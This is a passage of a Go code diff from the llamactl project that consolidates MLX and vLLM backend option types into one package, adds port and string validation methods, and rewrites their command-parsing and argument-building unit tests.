||||
|
||||
type MlxServerOptions struct {
|
||||
@@ -30,10 +31,43 @@ type MlxServerOptions struct {
|
||||
MaxTokens int `json:"max_tokens,omitempty"`
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) GetPort() int {
|
||||
return o.Port
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) SetPort(port int) {
|
||||
o.Port = port
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) GetHost() string {
|
||||
return o.Host
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) Validate() error {
|
||||
if o == nil {
|
||||
return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
|
||||
}
|
||||
|
||||
if err := validation.ValidateStructStrings(o, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if o.Port < 0 || o.Port > 65535 {
|
||||
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildCommandArgs converts to command line arguments
|
||||
func (o *MlxServerOptions) BuildCommandArgs() []string {
|
||||
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
|
||||
return backends.BuildCommandArgs(o, multipleFlags)
|
||||
return BuildCommandArgs(o, multipleFlags)
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) BuildDockerArgs() []string {
|
||||
return []string{}
|
||||
}
|
||||
|
||||
// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
|
||||
@@ -48,7 +82,7 @@ func ParseMlxCommand(command string) (*MlxServerOptions, error) {
|
||||
multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags
|
||||
|
||||
var mlxOptions MlxServerOptions
|
||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
|
||||
if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
@@ -1,157 +0,0 @@
|
||||
package mlx_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends/mlx"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseMlxCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
}{
|
||||
{
|
||||
name: "basic command",
|
||||
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "args only",
|
||||
command: "--model /path/to/model --port 8080",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "mixed flag formats",
|
||||
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "quoted strings",
|
||||
command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`,
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "malformed flag",
|
||||
command: "mlx_lm.server ---model test.mlx",
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := mlx.ParseMlxCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseMlxCommandValues(t *testing.T) {
|
||||
command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG"
|
||||
result, err := mlx.ParseMlxCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "/test/model.mlx" {
|
||||
t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model)
|
||||
}
|
||||
|
||||
if result.Port != 8080 {
|
||||
t.Errorf("expected port 8080, got %d", result.Port)
|
||||
}
|
||||
|
||||
if result.Temp != 0.7 {
|
||||
t.Errorf("expected temp 0.7, got %f", result.Temp)
|
||||
}
|
||||
|
||||
if !result.TrustRemoteCode {
|
||||
t.Errorf("expected trust_remote_code to be true")
|
||||
}
|
||||
|
||||
if result.LogLevel != "DEBUG" {
|
||||
t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs(t *testing.T) {
|
||||
options := &mlx.MlxServerOptions{
|
||||
Model: "/test/model.mlx",
|
||||
Host: "127.0.0.1",
|
||||
Port: 8080,
|
||||
Temp: 0.7,
|
||||
TopP: 0.9,
|
||||
TopK: 40,
|
||||
MaxTokens: 2048,
|
||||
TrustRemoteCode: true,
|
||||
LogLevel: "DEBUG",
|
||||
ChatTemplate: "custom template",
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that all expected flags are present
|
||||
expectedFlags := map[string]string{
|
||||
"--model": "/test/model.mlx",
|
||||
"--host": "127.0.0.1",
|
||||
"--port": "8080",
|
||||
"--log-level": "DEBUG",
|
||||
"--chat-template": "custom template",
|
||||
"--temp": "0.7",
|
||||
"--top-p": "0.9",
|
||||
"--top-k": "40",
|
||||
"--max-tokens": "2048",
|
||||
}
|
||||
|
||||
for i := 0; i < len(args); i++ {
|
||||
if args[i] == "--trust-remote-code" {
|
||||
continue // Boolean flag with no value
|
||||
}
|
||||
if args[i] == "--use-default-chat-template" {
|
||||
continue // Boolean flag with no value
|
||||
}
|
||||
|
||||
if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) {
|
||||
if args[i+1] != expectedValue {
|
||||
t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1])
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check boolean flags
|
||||
foundTrustRemoteCode := false
|
||||
for _, arg := range args {
|
||||
if arg == "--trust-remote-code" {
|
||||
foundTrustRemoteCode = true
|
||||
}
|
||||
}
|
||||
if !foundTrustRemoteCode {
|
||||
t.Errorf("expected --trust-remote-code flag to be present")
|
||||
}
|
||||
}
|
||||
202
pkg/backends/mlx_test.go
Normal file
202
pkg/backends/mlx_test.go
Normal file
@@ -0,0 +1,202 @@
|
||||
package backends_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/testutil"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseMlxCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
validate func(*testing.T, *backends.MlxServerOptions)
|
||||
}{
|
||||
{
|
||||
name: "basic command",
|
||||
command: "mlx_lm.server --model /path/to/model --host 0.0.0.0",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/path/to/model" {
|
||||
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Host != "0.0.0.0" {
|
||||
t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "args only",
|
||||
command: "--model /path/to/model --port 8080",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/path/to/model" {
|
||||
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Port != 8080 {
|
||||
t.Errorf("expected port 8080, got %d", opts.Port)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "mixed flag formats",
|
||||
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/path/model" {
|
||||
t.Errorf("expected model '/path/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Temp != 0.7 {
|
||||
t.Errorf("expected temp 0.7, got %f", opts.Temp)
|
||||
}
|
||||
if !opts.TrustRemoteCode {
|
||||
t.Errorf("expected trust_remote_code to be true")
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "multiple value types",
|
||||
command: "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.MlxServerOptions) {
|
||||
if opts.Model != "/test/model.mlx" {
|
||||
t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.Port != 8080 {
|
||||
t.Errorf("expected port 8080, got %d", opts.Port)
|
||||
}
|
||||
if opts.Temp != 0.7 {
|
||||
t.Errorf("expected temp 0.7, got %f", opts.Temp)
|
||||
}
|
||||
if !opts.TrustRemoteCode {
|
||||
t.Errorf("expected trust_remote_code to be true")
|
||||
}
|
||||
if opts.LogLevel != "DEBUG" {
|
||||
t.Errorf("expected log_level 'DEBUG', got '%s'", opts.LogLevel)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `mlx_lm.server --model test.mlx --chat-template "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "malformed flag",
|
||||
command: "mlx_lm.server ---model test.mlx",
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := backends.ParseMlxCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
return
|
||||
}
|
||||
|
||||
if tt.validate != nil {
|
||||
tt.validate(t, result)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestMlxBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options backends.MlxServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "trust_remote_code true",
|
||||
options: backends.MlxServerOptions{
|
||||
TrustRemoteCode: true,
|
||||
},
|
||||
expected: []string{"--trust-remote-code"},
|
||||
},
|
||||
{
|
||||
name: "trust_remote_code false",
|
||||
options: backends.MlxServerOptions{
|
||||
TrustRemoteCode: false,
|
||||
},
|
||||
excluded: []string{"--trust-remote-code"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: backends.MlxServerOptions{
|
||||
TrustRemoteCode: true,
|
||||
UseDefaultChatTemplate: true,
|
||||
},
|
||||
expected: []string{"--trust-remote-code", "--use-default-chat-template"},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
args := tt.options.BuildCommandArgs()
|
||||
|
||||
for _, expectedArg := range tt.expected {
|
||||
if !testutil.Contains(args, expectedArg) {
|
||||
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
for _, excludedArg := range tt.excluded {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestMlxBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := backends.MlxServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
TopK: 0, // Should be excluded
|
||||
Temp: 0, // Should be excluded
|
||||
Model: "", // Should be excluded
|
||||
LogLevel: "", // Should be excluded
|
||||
TrustRemoteCode: false, // Should be excluded
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Zero values should not appear in arguments
|
||||
excludedArgs := []string{
|
||||
"--port", "0",
|
||||
"--top-k", "0",
|
||||
"--temp", "0",
|
||||
"--model", "",
|
||||
"--log-level", "",
|
||||
"--trust-remote-code",
|
||||
}
|
||||
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -1,11 +1,12 @@
|
||||
package vllm
|
||||
package backends
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"fmt"
|
||||
"llamactl/pkg/validation"
|
||||
)
|
||||
|
||||
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
var multiValuedFlags = map[string]bool{
|
||||
// vllmMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
var vllmMultiValuedFlags = map[string]bool{
|
||||
"api-key": true,
|
||||
"allowed-origins": true,
|
||||
"allowed-methods": true,
|
||||
@@ -139,6 +140,36 @@ type VllmServerOptions struct {
|
||||
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) GetPort() int {
|
||||
return o.Port
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) SetPort(port int) {
|
||||
o.Port = port
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) GetHost() string {
|
||||
return o.Host
|
||||
}
|
||||
|
||||
func (o *VllmServerOptions) Validate() error {
|
||||
if o == nil {
|
||||
return validation.ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
|
||||
}
|
||||
|
||||
// Use reflection to check all string fields for injection patterns
|
||||
if err := validation.ValidateStructStrings(o, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if o.Port < 0 || o.Port > 65535 {
|
||||
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildCommandArgs converts VllmServerOptions to command line arguments
|
||||
// For vLLM native, model is a positional argument after "serve"
|
||||
func (o *VllmServerOptions) BuildCommandArgs() []string {
|
||||
@@ -155,7 +186,7 @@ func (o *VllmServerOptions) BuildCommandArgs() []string {
|
||||
|
||||
// Use package-level multipleFlags variable
|
||||
|
||||
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
|
||||
flagArgs := BuildCommandArgs(&optionsCopy, vllmMultiValuedFlags)
|
||||
args = append(args, flagArgs...)
|
||||
|
||||
return args
|
||||
@@ -165,7 +196,7 @@ func (o *VllmServerOptions) BuildDockerArgs() []string {
|
||||
var args []string
|
||||
|
||||
// Use package-level multipleFlags variable
|
||||
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
|
||||
flagArgs := BuildCommandArgs(o, vllmMultiValuedFlags)
|
||||
args = append(args, flagArgs...)
|
||||
|
||||
return args
|
||||
@@ -192,7 +223,7 @@ func ParseVllmCommand(command string) (*VllmServerOptions, error) {
|
||||
}
|
||||
|
||||
var vllmOptions VllmServerOptions
|
||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
|
||||
if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
@@ -1,153 +0,0 @@
|
||||
package vllm_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends/vllm"
|
||||
"slices"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseVllmCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
}{
|
||||
{
|
||||
name: "basic vllm serve command",
|
||||
command: "vllm serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "serve only command",
|
||||
command: "serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "positional model with flags",
|
||||
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "model with path",
|
||||
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
|
||||
expectErr: false,
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `vllm serve "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := vllm.ParseVllmCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseVllmCommandValues(t *testing.T) {
|
||||
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
|
||||
result, err := vllm.ParseVllmCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "test-model" {
|
||||
t.Errorf("expected model 'test-model', got '%s'", result.Model)
|
||||
}
|
||||
if result.TensorParallelSize != 4 {
|
||||
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
|
||||
}
|
||||
if result.GPUMemoryUtilization != 0.8 {
|
||||
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
|
||||
}
|
||||
if !result.EnableLogOutputs {
|
||||
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs(t *testing.T) {
|
||||
options := vllm.VllmServerOptions{
|
||||
Model: "microsoft/DialoGPT-medium",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
TensorParallelSize: 2,
|
||||
GPUMemoryUtilization: 0.8,
|
||||
EnableLogOutputs: true,
|
||||
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that model is the first positional argument (not a --model flag)
|
||||
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
|
||||
}
|
||||
|
||||
// Check that --model flag is NOT present (since model should be positional)
|
||||
if contains(args, "--model") {
|
||||
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
|
||||
}
|
||||
|
||||
// Check other flags
|
||||
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
|
||||
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
|
||||
}
|
||||
if !contains(args, "--enable-log-outputs") {
|
||||
t.Errorf("Expected --enable-log-outputs not found in %v", args)
|
||||
}
|
||||
if !contains(args, "--host") {
|
||||
t.Errorf("Expected --host not found in %v", args)
|
||||
}
|
||||
if !contains(args, "--port") {
|
||||
t.Errorf("Expected --port not found in %v", args)
|
||||
}
|
||||
|
||||
// Check array handling (multiple flags)
|
||||
allowedOriginsCount := 0
|
||||
for i := range args {
|
||||
if args[i] == "--allowed-origins" {
|
||||
allowedOriginsCount++
|
||||
}
|
||||
}
|
||||
if allowedOriginsCount != 2 {
|
||||
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper functions
|
||||
func contains(slice []string, item string) bool {
|
||||
return slices.Contains(slice, item)
|
||||
}
|
||||
|
||||
func containsFlagWithValue(args []string, flag, value string) bool {
|
||||
for i, arg := range args {
|
||||
if arg == flag && i+1 < len(args) && args[i+1] == value {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
286
pkg/backends/vllm_test.go
Normal file
286
pkg/backends/vllm_test.go
Normal file
@@ -0,0 +1,286 @@
|
||||
package backends_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/testutil"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestParseVllmCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
validate func(*testing.T, *backends.VllmServerOptions)
|
||||
}{
|
||||
{
|
||||
name: "basic vllm serve command",
|
||||
command: "vllm serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "serve only command",
|
||||
command: "serve microsoft/DialoGPT-medium",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "positional model with flags",
|
||||
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("expected model 'microsoft/DialoGPT-medium', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.TensorParallelSize != 2 {
|
||||
t.Errorf("expected tensor_parallel_size 2, got %d", opts.TensorParallelSize)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "model with path",
|
||||
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "/path/to/model" {
|
||||
t.Errorf("expected model '/path/to/model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPUMemoryUtilization != 0.8 {
|
||||
t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "multiple value types",
|
||||
command: "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.VllmServerOptions) {
|
||||
if opts.Model != "test-model" {
|
||||
t.Errorf("expected model 'test-model', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.TensorParallelSize != 4 {
|
||||
t.Errorf("expected tensor_parallel_size 4, got %d", opts.TensorParallelSize)
|
||||
}
|
||||
if opts.GPUMemoryUtilization != 0.8 {
|
||||
t.Errorf("expected gpu_memory_utilization 0.8, got %f", opts.GPUMemoryUtilization)
|
||||
}
|
||||
if !opts.EnableLogOutputs {
|
||||
t.Errorf("expected enable_log_outputs true, got %v", opts.EnableLogOutputs)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
command: "",
|
||||
expectErr: true,
|
||||
},
|
||||
{
|
||||
name: "unterminated quote",
|
||||
command: `vllm serve "unterminated`,
|
||||
expectErr: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := backends.ParseVllmCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
t.Errorf("expected error but got none")
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
t.Errorf("unexpected error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
return
|
||||
}
|
||||
|
||||
if tt.validate != nil {
|
||||
tt.validate(t, result)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options backends.VllmServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "enable_log_outputs true",
|
||||
options: backends.VllmServerOptions{
|
||||
EnableLogOutputs: true,
|
||||
},
|
||||
expected: []string{"--enable-log-outputs"},
|
||||
},
|
||||
{
|
||||
name: "enable_log_outputs false",
|
||||
options: backends.VllmServerOptions{
|
||||
EnableLogOutputs: false,
|
||||
},
|
||||
excluded: []string{"--enable-log-outputs"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: backends.VllmServerOptions{
|
||||
EnableLogOutputs: true,
|
||||
TrustRemoteCode: true,
|
||||
EnablePrefixCaching: true,
|
||||
DisableLogStats: false,
|
||||
},
|
||||
expected: []string{"--enable-log-outputs", "--trust-remote-code", "--enable-prefix-caching"},
|
||||
excluded: []string{"--disable-log-stats"},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
args := tt.options.BuildCommandArgs()
|
||||
|
||||
for _, expectedArg := range tt.expected {
|
||||
if !testutil.Contains(args, expectedArg) {
|
||||
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
for _, excludedArg := range tt.excluded {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
TensorParallelSize: 0, // Should be excluded
|
||||
GPUMemoryUtilization: 0, // Should be excluded
|
||||
Model: "", // Should be excluded (positional arg)
|
||||
Host: "", // Should be excluded
|
||||
EnableLogOutputs: false, // Should be excluded
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Zero values should not appear in arguments
|
||||
excludedArgs := []string{
|
||||
"--port", "0",
|
||||
"--tensor-parallel-size", "0",
|
||||
"--gpu-memory-utilization", "0",
|
||||
"--host", "",
|
||||
"--enable-log-outputs",
|
||||
}
|
||||
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
// Model should not be present as positional arg when empty
|
||||
if len(args) > 0 && args[0] == "" {
|
||||
t.Errorf("Empty model should not be present as positional argument")
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
|
||||
AllowedMethods: []string{"GET", "POST"},
|
||||
Middleware: []string{"middleware1", "middleware2", "middleware3"},
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that each array value appears with its flag
|
||||
expectedOccurrences := map[string][]string{
|
||||
"--allowed-origins": {"http://localhost:3000", "https://example.com"},
|
||||
"--allowed-methods": {"GET", "POST"},
|
||||
"--middleware": {"middleware1", "middleware2", "middleware3"},
|
||||
}
|
||||
|
||||
for flag, values := range expectedOccurrences {
|
||||
for _, value := range values {
|
||||
if !testutil.ContainsFlagWithValue(args, flag, value) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
AllowedOrigins: []string{}, // Empty array should not generate args
|
||||
Middleware: []string{}, // Empty array should not generate args
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
excludedArgs := []string{"--allowed-origins", "--middleware"}
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestVllmBuildCommandArgs_PositionalModel(t *testing.T) {
|
||||
options := backends.VllmServerOptions{
|
||||
Model: "microsoft/DialoGPT-medium",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
TensorParallelSize: 2,
|
||||
GPUMemoryUtilization: 0.8,
|
||||
EnableLogOutputs: true,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that model is the first positional argument (not a --model flag)
|
||||
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
|
||||
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
|
||||
}
|
||||
|
||||
// Check that --model flag is NOT present (since model should be positional)
|
||||
if testutil.Contains(args, "--model") {
|
